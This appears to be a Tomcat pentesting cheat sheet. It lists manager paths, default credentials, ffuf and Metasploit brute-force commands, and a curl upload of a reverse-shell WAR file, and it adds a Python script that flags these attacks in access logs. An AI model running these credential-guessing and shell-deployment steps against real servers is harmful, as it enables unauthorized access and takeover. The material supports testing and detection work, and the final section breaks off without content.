Apache Tomcat Pentesting
Apache Tomcat is an implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies.
Directories
Below are common directories for Apache Tomcat.
/examples
/examples/jsp/cal/login.html
/examples/jsp/error/error.html
/examples/jsp/snp/snoop.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/JndiServlet
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestParamExample
/host-manager
/manager
/manager/jmxproxy/?qry=STUFF
/manager/status
/manager/status/all
# Manager commands (list, deploy, undeploy, ...) are issued through the /manager/text/ interface
/manager/text/{command}?{parameters}
/manager/text/deploy?path=/foo
/manager/text/list
/manager/text/resources
/manager/text/serverinfo
/manager/text/vminfo
Directory Discovery
To enumerate directories automatically, use a fuzzing tool such as ffuf with a directory wordlist.
ffuf -u https://example.com/FUZZ -w directories.txt
ffuf -u https://example.com/host-manager/FUZZ -w directories.txt
ffuf -u https://example.com/manager/FUZZ -w directories.txt
Credentials
Below are common credentials for the manager app in Tomcat.
admin:(empty)
admin:admin
admin:password
admin:password1
admin:Password1
admin:tomcat
manager:manager
root:changethis
root:password
root:password1
root:root
root:r00t
root:toor
tomcat:(empty)
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:s3cret
tomcat:tomcat
User Enumeration
# Metasploit
msf> use auxiliary/scanner/http/tomcat_enum
msf> set TARGETURI /manager # adjust to where the manager app is exposed on the target
Brute Force Credentials
ffuf -u https://tomcat:FUZZ@example.com/manager -w passwords.txt -fs 140 # filter out responses of the size returned on failed logins
# Metasploit
msf> use auxiliary/scanner/http/tomcat_mgr_login
msf> set VHOST example.local
msf> set stop_on_success true
msf> set username tomcat
msf> set RHOSTS <target-ip>
Remote Code Execution (RCE)
Using Metasploit
Uploading WAR file (Reverse Shell)
First, create a WAR file containing a reverse shell with Msfvenom.
Then upload it through the manager's text interface (curl --upload-file sends a PUT request).
curl --upload-file shell.war -u 'tomcat:password' "https://example.com/manager/text/deploy?path=/shell"
Start a listener on the local machine.
Now access https://example.com/shell.
We should get a shell.
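As an added detection-side example (not part of the original cheat sheet), the following Python script parses Tomcat access-log lines in the AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b) and flags both activities described in the Brute Force Credentials and WAR upload sections: repeated 401 responses against the manager app from a single client, and successful PUT requests to /manager/text/deploy. The log lines, IP addresses and the threshold of 5 failures are constructed assumptions.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Constructed sample log (not from a real system): a password-guessing run
# against /manager that ends in success, followed by a WAR deployment.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [10/Oct/2023:13:55:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [10/Oct/2023:13:55:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [10/Oct/2023:13:55:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - tomcat [10/Oct/2023:13:55:03 +0000] "GET /manager/html HTTP/1.1" 200 19203
203.0.113.7 - tomcat [10/Oct/2023:13:55:09 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 48
198.51.100.4 - - [10/Oct/2023:13:56:00 +0000] "GET /examples/servlet/RequestInfoExample HTTP/1.1" 200 1120
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, auth_fail_threshold=5):
    """Return clients with repeated manager-app auth failures and successful deploys."""
    failures = defaultdict(int)
    deploys = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        if not (path.startswith("/manager") or path.startswith("/host-manager")):
            continue
        if rec["status"] == "401":
            failures[rec["host"]] += 1
        if rec["method"] == "PUT" and "/text/deploy" in path and rec["status"] == "200":
            deploys.append((rec["host"], rec["user"], path))
    brute = {h: n for h, n in failures.items() if n >= auth_fail_threshold}
    return {"brute_force_sources": brute, "deployments": deploys}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```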
Investigation From Inside
If we are on the target system, we can retrieve information about credentials.